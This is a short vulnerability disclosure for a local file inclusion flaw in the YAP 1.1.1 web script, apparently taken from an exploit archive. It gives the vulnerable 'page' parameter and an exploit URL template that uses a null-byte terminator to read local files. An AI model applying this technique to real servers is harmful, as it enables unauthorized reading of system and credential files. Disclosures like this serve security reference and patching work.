id: 4931
date: 03/13/2009
title: YAP 1.1.1 (index.php page) Local File Inclusion Vulnerability
author: Alkindiii
cves: 

=============================================================
YAP 1.1.1 (index.php page) Local File Inclusion Vulnerability
=============================================================


#########################################################
#	YAP v1.1.1 Local File Inclusion Vulnerability	#
#########################################################


# AUTHOR			: Alkindiii
# HOME				: http://www.soqor.net


# Script			: YAP
# Version			: 1.1.1
# Download v1.1			: http://wildmary.net-sauvage.com/share/yap1.1.tar.gz
# Update to v1.1.1		: http://wildmary.net-sauvage.com/share/yap-patch1.1.1.zip


# EXPLOIT			: http://www.site.com/index.php?page=[LFI]%00



#  0day.today [2023-03-21]  #